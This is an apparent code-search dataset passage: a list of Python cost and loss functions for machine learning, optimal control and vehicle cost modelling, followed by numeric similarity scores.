[xd,xa,u,p,puni,l],[Lagrange_Tracking])\n Lagrange_Regularisation = ca.Function( 'lagrange_reg', [xd,xa,u,p,puni,l],[Lagrange_Regularisation])\n\n\n Tracking = 0\n Regularisation = 0\n\n\n for k in range(self.nk): # V['XA',k,0] is not same time step as V['Xd',k,0] but same result\n ftrack = Lagrange_Tracking(V['Xd',k,0], V['XA',k,0], V['U',k], P['p',k,0],P['puni'], V['l'])\n Tracking += ftrack\n\n freg = Lagrange_Regularisation(V['Xd',k,0], V['XA',k,0], V['U',k], P['p',k,0],P['puni'], V['l'])\n Regularisation += freg\n\n E_final = 10. 
* V['Xd',-1,-1,'E'] # for maximising final energy\n Tracking_Cost = (1-P['toggle_to_energy']) * Tracking #* 1e-3 # Tracking of initial guess\n Regularisation_Cost = Regularisation # Regularisation of inputs\n Lift_Cost = 0.5*V['vlift']**2 #* 1e2 # Regularisation of inputs\n Energy_Cost = P['toggle_to_energy'] * (E_final/params['sref'])/V['tf']\n SOSCFix = 10. * V['Xd',self.nk/4,0,'q',1]**2\n\n Cost = 0\n Cost = (Tracking_Cost + Regularisation_Cost + Lift_Cost + SOSCFix)/float(self.nk) + Energy_Cost\n\n return Cost", "def cost(TH,X,Y,lda=1):\n m = X.shape[0]\n htx = ff(X,TH)[-1]\n\n termsum = 0\n for rn in range(m):\n termsum += (-1.*Y[rn,:])*(np.log(htx[rn,:]).T) -(1. -Y[rn,:])*(np.log(1. -htx[rn,:]).T)\n termsum = 1./m*(termsum)\n\n regsum = 0\n for th in TH:\n regsum += sum(sum(np.power(th[:,1:],2)))\n regsum = lda/(2.*m)*regsum\n\n return termsum[0,0] +regsum", "def cost_function(params, count):\n circuit = models.Circuit(nqubits)\n for l in range(layers):\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n for q in range(0, nqubits - 1, 2):\n circuit.add(gates.CZ(q, q + 1))\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n for q in range(1, nqubits - 2, 2):\n circuit.add(gates.CZ(q, q + 1))\n circuit.add(gates.CZ(0, nqubits - 1))\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n\n cost = 0\n circuit.set_parameters(\n params\n ) # this will change all thetas to the appropriate values\n for i in range(len(ising_groundstates)):\n final_state = circuit(np.copy(ising_groundstates[i]))\n cost += np.real(encoder.expectation(final_state.state()))\n\n if count[0] % 50 == 0:\n print(count[0], cost / len(ising_groundstates))\n count[0] += 1\n\n return cost / len(ising_groundstates)", "def fit(self, X, y):\n X = self.normalize_data(X)\n X = self.add_bias(X)\n n_tasks = len(X)\n n_feats = X[0].shape[1]\n W = np.random.randn(n_feats, n_tasks)\n cost_function = 0\n start = time.time()\n for t in range(n_tasks):\n fista = Fista(self, self.lambda_1)\n w_opt = fista.fit(W[:, t], X[t], y[t], self.groups,\n max_iter=self.max_iter)\n W[:, t] = w_opt\n cost_function += self.cost(X[t], y[t], W[:, t])\n stop = time.time() - start\n self.W = W\n return W, np.array([cost_function]), stop", "def compute_cost(self,X, y):\r\n num_examples = np.shape(X)[0]\r\n z = np.dot(X,self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n \r\n one_hot_y = np.zeros((num_examples,np.max(y)+1))\r\n logloss = np.zeros((num_examples,)) \r\n for i in range(np.shape(X)[0]):\r\n one_hot_y[i,y[i]] = 1\r\n logloss[i] = -np.sum(np.log(softmax_scores[i,:]) * one_hot_y[i,:])\r\n data_loss = np.sum(logloss)\r\n return 1./num_examples * data_loss", "def _learn_using_SGD(self, y, tx, w, batch_size, fn, gamma, lambda_, regularization):\n for y_batch, tx_batch in batch_iter(y, tx, batch_size=batch_size, num_batches=1):\n loss, grad = fn(y_batch, tx_batch, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def running_cost(self, t_span, step_size, x):\n cost = 0\n ones = torch.ones(x.shape[1], 1, device=x.device)\n for idx,t in enumerate(t_span):\n input_nn = torch.cat([ones*t, x[idx,:,:]], 1)\n X_C_X = self.x_M_x(x[idx,:,:], self.C)\n alpha_t = self.func_ode.alpha(input_nn)\n alpha_D_alpha = self.x_M_x(alpha_t, self.D)\n cost += step_size*(X_C_X + alpha_D_alpha)\n return cost", "def adjust_cost(self) -> None:\n\n n_iterations = 
self.array.shape[-1]\n n_year = len(self.array.year.values)\n\n # If uncertainty is not considered, the cost factor equals 1.\n # Otherwise, a variability of +/-30% is added.\n\n if n_iterations == 1:\n cost_factor = 1\n else:\n if \"reference\" in self.array.value.values.tolist():\n cost_factor = np.ones((n_iterations, 1))\n else:\n cost_factor = np.random.triangular(0.7, 1, 1.3, (n_iterations, 1))\n\n # Correction of hydrogen tank cost, per kg\n # Correction of fuel cell stack cost, per kW\n if \"FCEV\" in self.array.powertrain:\n self.array.loc[\n dict(powertrain=\"FCEV\", parameter=\"fuel tank cost per kg\")\n ] = np.reshape(\n (1.078e58 * np.exp(-6.32e-2 * self.array.year.values) + 3.43e2)\n * cost_factor,\n (1, n_year, n_iterations),\n )\n\n self.array.loc[\n dict(powertrain=\"FCEV\", parameter=\"fuel tank cost per kg\")\n ] = np.reshape(\n (3.15e66 * np.exp(-7.35e-2 * self.array.year.values) + 2.39e1)\n * cost_factor,\n (1, n_year, n_iterations),\n )\n\n # Correction of energy battery system cost, per kWh\n list_batt = [\n i\n for i in [\"BEV\", \"PHEV-e\", \"PHEV-c-p\", \"PHEV-c-d\"]\n if i in self.array.powertrain\n ]\n if len(list_batt) > 0:\n self.array.loc[\n dict(powertrain=list_batt, parameter=\"energy battery cost per kWh\")\n ] = np.reshape(\n (2.75e86 * np.exp(-9.61e-2 * self.array.year.values) + 5.059e1)\n * cost_factor,\n (1, 1, n_year, n_iterations),\n )\n\n # Correction of power battery system cost, per kW\n list_pwt = [\n i\n for i in [\n \"ICEV-p\",\n \"ICEV-d\",\n \"ICEV-g\",\n \"PHEV-c-p\",\n \"PHEV-c-d\",\n \"FCEV\",\n \"HEV-p\",\n \"HEV-d\",\n ]\n if i in self.array.powertrain\n ]\n\n if len(list_pwt) > 0:\n self.array.loc[\n dict(powertrain=list_pwt, parameter=\"power battery cost per kW\")\n ] = np.reshape(\n (8.337e40 * np.exp(-4.49e-2 * self.array.year.values) + 11.17)\n * cost_factor,\n (1, 1, n_year, n_iterations),\n )\n\n # Correction of combustion powertrain cost for ICEV-g\n if \"ICEV-g\" in self.array.powertrain:\n self.array.loc[\n dict(powertrain=\"ICEV-g\", parameter=\"combustion powertrain cost per kW\")\n ] = np.clip(\n np.reshape(\n (5.92e160 * np.exp(-0.1819 * self.array.year.values) + 26.76)\n * cost_factor,\n (1, n_year, n_iterations),\n ),\n None,\n 100,\n )", "def cost(self, output, labels, weights):\n return tf.multiply(0.5 * tf.square(output - labels), weights)", "def evaluate_function(self, trajectory):\n objective_values_by_tag = self.evaluate_function_by_objective(trajectory)\n objective_function_values = 0.\n objective_distance_to_goal = 0.\n objective_function_values_init = 0.\n\n reachability_cost = False\n\n # Judge if we are using reachability cost\n for tag, objective_values in objective_values_by_tag:\n if tag == 'reach_avoid_4d':\n reachability_cost = True\n\n # No freezing cost!\n if reachability_cost:\n for tag, objective_values in objective_values_by_tag:\n if tag == 'reach_avoid_4d' or 'avoid_4d':\n objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n else:\n for tag, objective_values in objective_values_by_tag:\n objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n # ## Freeze the sum of 2 costs, at the minimum of the sum of cost\n # if reachability_cost:\n # for tag, objective_values in objective_values_by_tag:\n # if tag == 'reach_avoid_4d' or 'avoid_4d':\n # objective_function_values += objective_values\n # if tag == 'distance_to_goal':\n # objective_distance_to_goal += objective_values\n # try:\n # ## Freeze_v1, freeze at the minimum cost of 
sum: reach_avoid + avoid\n # # objective_function_values = self._freeze_cost_v1(objective_function_values, objective_distance_to_goal)\n #\n # # Freeze v2, freeze at the minimum cost of only reach_avoid\n # objective_function_values = self._freeze_cost_v2(objective_values_by_tag, objective_function_values, objective_distance_to_goal)\n # objective_function_values = self._reduce_objective_values(trajectory, objective_function_values)\n # except ValueError:\n # print(\"cannot freeze in total cost\")\n # objective_function_values = self._reduce_objective_values(trajectory, objective_function_values)\n # else:\n # for tag, objective_values in objective_values_by_tag:\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n # ## Freeze the sum of 2 costs, at the minimum of the reach_avoid cost\n # if reachability_cost:\n # for tag, objective_values in objective_values_by_tag:\n # if tag == 'reach_avoid_4d' or 'avoid_4d':\n # objective_function_values = self._freeze_cost_v2(objective_values, objective_distance_to_goal)\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n # else:\n # for tag, objective_values in objective_values_by_tag:\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n return objective_function_values", "def calc_cost(self):\n \n correct_pred = tf.equal(self.predictions, tf.argmax(self.y,1))\n batchaccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) \n return self.cost, batchaccuracy, self.predictions", "def cost(self) -> float:", "def compute_cost_gradient2(x, y0, W, V, U, b0, b1, b2):\n # compute cost\n A1 = x @ W + b0\n A2 = x @ V + b1\n z0 = sigmoid(A1)\n z1 = sigmoid(A2)\n z = np.array([z0, z1]).T\n A3 = z @ U + b2\n y = sigmoid(A3)\n if y0 is None:\n return y\n cost = np.sum((y - y0) ** 2)\n # compute gradient\n dy = 2 * (y - y0)\n dA3 = dy * (y * (1 - y))\n dz0 = dA3 * U[0]\n dz1 = dA3 * U[1]\n dA1 = dz0 * (z0 * (1 - z0))\n dA2 = dz1 * (z1 * (1 - z1))\n dW = x.T @ dA1\n dV = x.T @ dA2\n dU = z.T @ dA3\n db0 = np.sum(dA1)\n db1 = np.sum(dA2)\n db2 = np.sum(dA3)\n return cost, dW, dV, dU, db0, db1, db2", "def f_tf(self, t, x, y, z):\n raise NotImplementedError", "def _learn_using_GD(self, y, tx, w, fn, gamma, lambda_, regularization):\n loss, grad = fn(y, tx, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def objective(xs, fps, fns):\n Wp = - np.log(fpr / (1 - fpr)) # Weight for false positives\n Wn = - np.log(fnr / (1 - fnr)) # Weight for false negatives\n Wx = - np.log(f / (1 - f)) # Weight for all positives\n return np.sum(xs) * Wx + np.sum(fps) * Wp + np.sum(fns) * Wn", "def costFunctionReg(theta, X, y, Lambda):\n # Initialize some useful values\n m = len(y) # number of training examples\n j = costFunction(theta, X, y)\n j += (Lambda/(2*m))*np.sum(theta[1:]**2)\n return j", "def compute_thetas(X, A=None, penalty='consensus', shuffle_arcs=False, return_D=False):\n def _col_shuf(arr):\n arr = arr.copy()\n for i in range(arr.shape[1]):\n np.random.shuffle(arr[:, i])\n return arr\n\n def _compute_A():\n A = np.empty((6, 5))\n for i, _ in enumerate(df_main.iterrows()):\n # Loop through columns\n for j in range(5):\n vals = [df.iloc[i, j] for df in dfs]\n A[i, j] = np.median(vals)\n\n if shuffle_arcs:\n return _col_shuf(A)\n\n return A\n\n def _compute_W():\n \"\"\"Get weight array W.\"\"\"\n if penalty == \"consensus\":\n W = 1.0 * 
np.array(\n [[0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 0, 0],\n [1, 1, 1, 1, 0],\n [0, 0, 1, 0, 0]]\n )\n elif penalty in ['var', 'std']:\n W = np.empty((6, 5))\n for i, _ in enumerate(df_main.iterrows()):\n for j in range(5):\n vals = [df.iloc[i, j] for df in dfs]\n W[i, j] = np.std(vals)\n\n if penalty == 'var':\n W = W ** 2\n W = 1 / W\n else:\n W = np.ones((6, 5))\n\n return W / W.sum(axis=1).reshape((-1, 1))\n\n def _dist(x, a, w):\n \"\"\"Compute the WED between vector x from X and vector a from A.\n \"\"\"\n m_xa = 0\n for k in range(len(x)):\n m_xa += (x[k] - a[k])**2 * w[k]\n return m_xa\n\n if A is None: # Then build A from Big Five data\n if X.shape[1] != 5:\n raise TypeError('Datapoints needs to have 5 columns.')\n\n df_main = pd.read_csv('build_dataset/data/archetypes.csv')\n\n dfs = [\n df_main.iloc[:, range(0, 5)],\n df_main.iloc[:, range(5, 10)],\n df_main.iloc[:, range(10, 15)]\n ]\n\n A = _compute_A()\n W = _compute_W()\n\n elif X.shape[1] != A.shape[1]:\n raise TypeError('Datapoints and archetypes have different dimensions.')\n else:\n W = np.ones(A.shape)\n W = W / W.sum(axis=1).reshape((-1, 1))\n\n rows, cols = X.shape[0], A.shape[0]\n D = np.zeros((rows, cols))\n\n for i in range(rows):\n x = X[i, :]\n for j in range(cols):\n a = A[j, :]\n w = W[j, :]\n D[i, j] = _dist(x, a, w)\n \n if return_D:\n return D\n\n M = np.max(D, axis=1).reshape((-1, 1)) - D\n return M * 1.0 / np.sum(M, axis=1).reshape((-1, 1))", "def cost(lossvalues):\n return np.sum(lossvalues ** 2) / (2 * lossvalues.shape[1])", "def lrCostFunction(theta, X, y, lambda_):\n if X.ndim == 1:\n X = X.reshape(1, -1)\n\n if y.dtype == bool:\n y = y.astype(int)\n\n # Initialize some useful values\n m = len(y) # number of training examples\n\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the cost of a particular choice of theta.\n # You should set J to the cost.\n #\n # Hint: The computation of the cost function and gradients can be\n # efficiently vectorized. For example, consider the computation\n #\n # sigmoid(X * theta)\n #\n # Each row of the resulting matrix will contain the value of the\n # prediction for that example. 
You can make use of this to vectorize\n # the cost function and gradient computations.\n #\n\n z = X @ theta\n h = sigmoid(z)\n\n theta_ = np.r_[0, theta[1:]]\n\n J = (-y @ np.log(h) - (1 - y) @ np.log(1 - h)) / m\n J += lambda_ * sum(theta_**2) / (2 * m)\n\n grad = (h - y) @ X / m\n grad += lambda_ * theta_ / m\n\n # =============================================================\n\n return J, grad", "def Cost(self, input_data: list, target_output_data: list):\n error = 0\n for input_, target_output in zip(input_data, target_output_data):\n generated_output = self.Evaluate(input_)\n for target_output_value, generated_output_value in zip(target_output, generated_output):\n error += (target_output_value - generated_output_value) ** 2\n return error / (2 * len(input_data))", "def compute_cost_derivative(AL, Y):\n pass", "def costFunction(R, W):\n costFunc = 0\n for i in range(0, len(R)):\n for j in range(i, len(R)):\n costFunc += costBetweenNodes(R, W, i, j)\n return costFunc", "def costFunction(theta, X, y):\n\n # Initialize some useful values\n m = y.size # number of training examples\n J = np.sum(np.array([inner(theta, xi, yi) for xi, yi in zip(X, y)]))\n J /= m\n\n\n return J", "def cost(predictions, targets):\n # averages the error across all data points, taking the values that have not been rounded to 0 and 1.\n return np.mean( (predictions - targets)**2)", "def compute_cost(X, y, theta, lambd):\n assert(theta.shape[0] == X.shape[1])\n \n m = X.shape[0]\n grad = np.zeros(y.shape)\n J = 0\n \n output = sigmoid(np.dot(X, theta))\n\n J = np.sum(- y * np.log(output) - (1 - y) * np.log(1 - output)) / m + lambd / (2 * m) * np.sum(np.square(theta[1:]))\n\n grad = np.dot(X.T, (output - y)) / m\n \n grad[1:] = grad[1:] + lambd / m * theta[1:]\n\n return J, grad", "def cost(self, data_X, data_Y):\n c = self.cost_function(data_Y, self.predict(data_X))\n\n if self.regularizer is not None:\n c += self.regularizer.cost(self.particle_input, self.layers)\n\n return c", "def compute_cost_and_grad_with_reg(theta, X, y, lambda_):\n m = X.shape[0]\n y_hat = sigmoid(X @ theta.T)\n J = - (1 / m) * np.sum(y * np.log(y_hat) + (1 - y) * np.log(1 - y_hat)) + np.sum(lambda_ / (2 * m) * theta[1:] ** 2)\n temp = theta\n temp[0] = 0\n grad = (1 / m) * X.T @ (y_hat - y) + lambda_ / m * temp\n return J, grad", "def cost_function (model, X, y, lambda_reg=0.):\n\n m = len (y)\n pred = model.predict (X)\n cost = 1. / (2. * m) * ((pred - y)**2).sum () + \\\n lambda_reg / (2. 
* m) * (model.coef_**2).sum ()\n return (cost)", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def compile(self):\n\n target_values = T.fmatrix('target_values')\n\n train_output = lasagne.layers.get_output(self.l_out)\n\n pred_output = lasagne.layers.get_output(self.l_out, deterministic=True)\n\n reg = lasagne.regularization.regularize_layer_params(self.l_out, lasagne.regularization.l2)\n\n train_cost = self.cost_function(train_output,target_values).mean() + reg * 0.01\n \n real_cost = self.cost_function(pred_output, target_values).mean() + reg * 0.01\n\n # Retrieve all parameters from the network\n all_params = lasagne.layers.get_all_params(self.l_out,trainable=True)\n\n self.logger.info(\"Computing updates...\")\n updates = self.update_function(train_cost, all_params, LEARNING_RATE)\n\n \n self.logger.info(\"Compiling functions ...\")\n\n # compile Theano GPU functions for training and computing train_cost\n self._train = theano.function([self.in_layer.input_var, self.i_mask.input_var, target_values], train_cost, \n updates=updates, allow_input_downcast=True)\n\n self._compute_cost = theano.function([self.in_layer.input_var, self.i_mask.input_var, target_values], real_cost, \n allow_input_downcast=True)\n\n self.label = theano.function([self.in_layer.input_var, self.i_mask.input_var],pred_output,allow_input_downcast=True)\n \n self._compiled = True", "def computing(self, inputList):\n\t\tr = 0\t# The sum variable\n\n\t\t# Summation and Threshold function(Activate function)\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tr += (int)(inputList[i]) * self.weight[i]\n\t\t\tif debugMode == True:\n\t\t\t\tprint \"\"\n\t\t\t\tprint \"input: \", inputList[i], \"weight: \", self.weight[i]\n\t\t\t\tprint \"sum: \", r\n\t\tif r > self.theta:\n\t\t\treturn 1.0\n\t\telse:\n\t\t\treturn -1.0;", "def __call__(self, x, u, k):\n first_time_through = True\n for cost, arg, weight in zip(self._costs, self._args, self._weights):\n if arg == \"x\":\n cost_input = x\n else:\n cost_input = u[arg]\n\n current_term = weight * cost(cost_input, k)\n if current_term > 1e8:\n print(\"Warning: cost %s is %f\" % (cost._name, current_term))\n print(\"Input is: \", cost_input)\n\n# if cost._name[:4] == \"bike\":\n# print(cost._name, \": \", current_term)\n\n if first_time_through:\n total_cost = current_term\n else:\n total_cost += current_term\n\n first_time_through = False\n\n return total_cost", "def costFunction(self, x, y ):\n self.yEst = self.forward_propagate(x)\n sqErrors = ( self.yEst - y ) ** 2\n J = sqErrors.sum() / 2\n return J", "def calc_optimal_target_permutation(feats: np.ndarray, targets: np.ndarray) -> np.ndarray:\n # Compute cost matrix\n cost_matrix = np.zeros([feats.shape[0], targets.shape[0]])\n # calc SSE between all features and targets\n for i in 
range(feats.shape[0]):\n cost_matrix[:, i] = np.sum(np.square(feats-targets[i, :]), axis=1)\n \n _, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n # Permute the targets based on hungarian algorithm optimisation\n targets[range(feats.shape[0])] = targets[col_ind]\n return targets", "def calc_cost(y, x, theta_1, theta_0):\n h = theta_1 * x + theta_0\n d = h - y\n cost = np.dot(d.T, d) / (2*x.shape[0])\n return cost.flat[0]", "def oneVsAll(X, y, num_labels, Lambda):\n\n# Some useful variables\n m, n = X.shape\n\n# You need to return the following variables correctly \n all_theta = [None] * num_labels\n\n# Add ones to the X data matrix\n X = np.column_stack((np.ones((m, 1)), X))\n\n# ====================== YOUR CODE HERE ======================\n# Instructions: You should complete the following code to train num_labels\n# logistic regression classifiers with regularization\n# parameter lambda. \n#\n# Hint: theta(:) will return a column vector.\n#\n# Hint: You can use y == c to obtain a vector of 1's and 0's that tell use \n# whether the ground truth is true/false for this class.\n#\n# Note: For this assignment, we recommend using fmincg to optimize the cost\n# function. It is okay to use a for-loop (for c = 1:num_labels) to\n# loop over the different classes.\n\n # Set Initial theta\n initial_theta = np.zeros((n + 1, 1))\n\n # This function will return theta and the cost\n for digit in range(num_labels):\n print('digit:', digit)\n result = scipy.optimize.minimize(lambda t: cost(X, y==digit, t, lambda_),\n initial_theta,\n jac=lambda t: gradient(X, y==digit, t, lambda_),\n method='L-BFGS-B')\n theta = result.x\n all_theta[digit] = theta\n\n\n# =========================================================================\n\n return all_theta", "def compute(self, inputs, outputs):\n\n # Add new variables to dictionnary\n cpacs = CPACS(Rt.modules[-1].cpacs_out)\n\n update_dict(cpacs.tixi, Rt.optim_var_dict)\n\n # Save the whole aeromap if needed\n if Rt.use_aeromap:\n update_am_dict(cpacs, Rt.aeromap_uid, Rt.am_dict)\n\n for obj in Rt.objective:\n var_list = split(\"[+*/-]\", obj)\n for v in var_list:\n if not v.isdigit() and v != \"\":\n exec('{} = inputs[\"{}\"]'.format(v, v))\n result = eval(obj)\n\n if Rt.minmax == \"min\":\n outputs[\"Objective function \" + obj] = result\n else:\n outputs[\"Objective function \" + obj] = -result", "def _make_train(self):\n with context.context(training=True):\n prediction = self(*self.inputs)\n thecost = self.cost(self.target, prediction)\n return theano.function(self.inputs + [self.target], \n thecost, \n updates=self.updater.get_updates(self.params(), thecost))", "def cost_function(data_x, data_y, parameters):\n # Residual sum of squares\n rss = np.sum((data_x @ parameters - data_y) ** 2)\n\n # Number of rows times 2\n nb_rows_x2 = 2 * data_x.shape[0]\n\n return rss / nb_rows_x2", "def compute_cost_fake(df):\n\timport numpy as np\n\timport cPickle\n\tfrom nn import nn_param\n\tfrom matplotlib import pyplot as plt\n\tfrom theano import tensor as T\n\tf=file(\"nnparams.sav\")\n\tupdate=cPickle.load(f)\n\tsig=np.asarray(df.l0)\n\tsig_noise=np.asarray(df.l0+df.noise)\n\tsig/=np.max(sig)\n\tsig_noise/=np.max(sig_noise)\n\tyval=nn_param(update,sig_noise)\n\treturn T.mean(squared_error(yval,sig))", "def calculateCost(self,sol,weights):\n\t\treturn sum([x.value*y if x != None else 0 \\\n\t\t\t\t\tfor x,y in zip(sol,weights)])" ]
[ "0.72324276", "0.7181755", "0.71723294", "0.69701", "0.69247854", "0.6471834", "0.6227543", "0.6182345", "0.617613", "0.6167203", "0.6144014", "0.6132684", "0.61300564", "0.6123157", "0.6107986", "0.6094501", "0.60778195", "0.6051131", "0.60425967", "0.60174876", "0.60173744", "0.59889996", "0.59743243", "0.59706753", "0.5959947", "0.59376675", "0.5933045", "0.59320205", "0.5924735", "0.5899899", "0.58993536", "0.5872297", "0.5863159", "0.5842421", "0.58324975", "0.58282", "0.5826795", "0.5821148", "0.58185786", "0.58044344", "0.5790787", "0.5772723", "0.5771345", "0.57520807", "0.5725595", "0.5725311", "0.5708302", "0.5706147", "0.5685726", "0.56686896", "0.56516206", "0.5634193", "0.563408", "0.5623906", "0.56227475", "0.5615299", "0.56079394", "0.5605532", "0.55939", "0.5593715", "0.5593547", "0.5580316", "0.55745476", "0.5566441", "0.55659896", "0.55624217", "0.5562287", "0.5544781", "0.5538518", "0.5537638", "0.5525659", "0.55218136", "0.55101", "0.5509815", "0.55006045", "0.54982764", "0.5491615", "0.5480157", "0.54776895", "0.5463443", "0.5460312", "0.5456778", "0.5453202", "0.54526037", "0.54391277", "0.5437517", "0.5430451", "0.54242855", "0.5424001", "0.5399902", "0.53981495", "0.5397562", "0.53935117", "0.5392931", "0.5391276", "0.53875965", "0.53855395", "0.53842384", "0.5383147", "0.5380583" ]
0.74634284
0
Perform gradient descent given a data set with an arbitrary number of features.
def gradient_descent(features, values, theta, alpha, num_iterations):
    m = len(values)
    cost_history = []

    for i in range(num_iterations):
        # your code here
        cost = compute_cost(features, values, theta)/(2.0*m)
        cost_history.append([cost])

        error = features.dot(theta) - values
        error = np.reshape(error,(error.shape[0], 1))
        errorWeighted = features*error
        errorSum = (np.sum(errorWeighted,0))/(m*1.0)
        theta = theta - alpha*errorSum

    return theta, pandas.Series(cost_history)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gradient_descent(features, labels, alpha, num_iters):\n # Initial settings of weights\n weights = [0, 0, 0]\n\n # Length of dataset\n N = len(features[0])\n\n # Take 100 gradient steps\n gradient_losses = [0, 0, 0]\n\n # Take num_iters steps of gradient descent\n for step in range(num_iters):\n\n # For reach data point, compute the gradients w.r.t. weights and offset\n for x1, x2, y in zip(features[0], features[1], labels):\n\n # Create \"expanded feature dimension for x to account for offset\n x = [1, x1, x2]\n\n # Make prediction\n pred = weights[0]*x[0] + weights[1]*x[1] + weights[2]*x[2]\n\n # Compute gradient of loss for linear regression\n for j in range(len(gradient_losses)):\n gradient_losses[j] += (pred-y) * x[j]\n\n # Update weights using gradients above\n for j in range(len(gradient_losses)):\n weights[j] -= (alpha/N) * gradient_losses[j]\n\n # Reset gradients of loss after each step\n gradient_losses = [0, 0, 0]\n\n # Return the weights\n return [weights[0], weights[1], weights[2]]", "def train_gradient_descent(self, X, y, learning_rate=0.01, n_iters=100):\r\n # Step 0: Initialize the parameters\r\n n_samples, n_features = X.shape\r\n self.weights = np.zeros(shape=(n_features,1))\r\n self.bias = 0\r\n costs = []\r\n\r\n for i in range(n_iters):\r\n # Step 1: Compute a linear combination of the input features and weights\r\n y_predict = np.dot(X, self.weights) + self.bias\r\n\r\n # Step 2: Compute cost over training set\r\n cost = (1 / n_samples) * np.sum((y_predict - y)**2)\r\n costs.append(cost)\r\n\r\n if i % 100 == 0:\r\n print(f\"Cost at iteration {i}: {cost}\")\r\n\r\n # Step 3: Compute the gradients\r\n dJ_dw = (2 / n_samples) * np.dot(X.T, (y_predict - y))\r\n dJ_db = (2 / n_samples) * np.sum((y_predict - y)) \r\n \r\n # Step 4: Update the parameters\r\n self.weights = self.weights - learning_rate * dJ_dw\r\n self.bias = self.bias - learning_rate * dJ_db\r\n\r\n return self.weights, self.bias, costs", "def run_gradient_descent(data,theta,alpha,num_iters):\n population = data[:,0]\n prices = data[:,1]\n x = ones(shape=(len(population),2)) #add ones for theta0 \n x[:,1] = population\n x = transpose(x)\n error_history = zeros(shape=(num_iters,1))\n \n for i in range(num_iters):\n predictions = theta.dot(x)\n errors_x1 = (predictions - prices) * x[0,:]\n errors_x2 = (predictions - prices) * x[1,:]\n theta[0][0] = theta[0][0] - alpha*(1.0/len(population))*errors_x1.sum()\n theta[0][1] = theta[0][1] - alpha*(1.0/len(population))*errors_x2.sum()\n error_history[i,0] = calculate_cost(theta,data)\n \n return theta, error_history", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line for the grader\r", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = 
len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def gradient_descent(data_x, data_y, parameters, learn_rate, nb_iterations):\n\n # Cost history\n cost_tracking = np.zeros(nb_iterations)\n\n for _i in range(nb_iterations):\n parameters -= learn_rate * gradient(data_x, data_y, parameters)\n # recording the cost for each iteration\n cost_tracking[_i] = cost_function(data_x, data_y, parameters)\n\n return parameters, cost_tracking", "def _batch_gradient_descent(self, X, y, lr, epochs):\n\n # Initialize the bias and weights.\n _, n = X.shape\n self.bias = 0\n self.weights = np.random.normal(size=n)\n\n for i in range(epochs):\n # Calculate and sum the gradient delta of each sample\n grad_bias, grad_weights = self._get_gradient(X, y)\n\n # Show the gradient of each epoch.\n grad = (grad_bias + grad_weights.mean()) / 2\n print(\"Epochs %d gradient %.3f\" % (i + 1, grad), flush=True)\n\n # Update the bias and weight by gradient of current epoch\n self.bias += lr * grad_bias\n self.weights += lr * grad_weights", "def _gradient_descent(self, X, y, epochs, learning_rate, batch_size):\n num_feats = X.shape[1]\n num_samples = X.shape[0]\n\n y = y.reshape(num_samples, 1)\n W = np.random.rand(num_feats, 1)\n training_loss_epochs = []\n\n for ix in range(epochs):\n shuffled_ix = (np.arange(0, len(X)))\n np.random.shuffle(shuffled_ix)\n X = X[shuffled_ix, :]\n y = y[shuffled_ix, :]\n\n for batch_ix in np.arange(0, X.shape[0], batch_size):\n dW = self._compute_gradient(W, X[batch_ix:batch_ix + batch_size], y[batch_ix:batch_ix + batch_size])\n W -= learning_rate * dW\n\n if ix % 10 == 0:\n y_pred = np.dot(X, W)\n training_loss = self.mse(y, y_pred)\n print('epoch {0} : training loss {1}'.format(ix, training_loss))\n training_loss_epochs.append(training_loss[0])\n\n self.weights = W\n 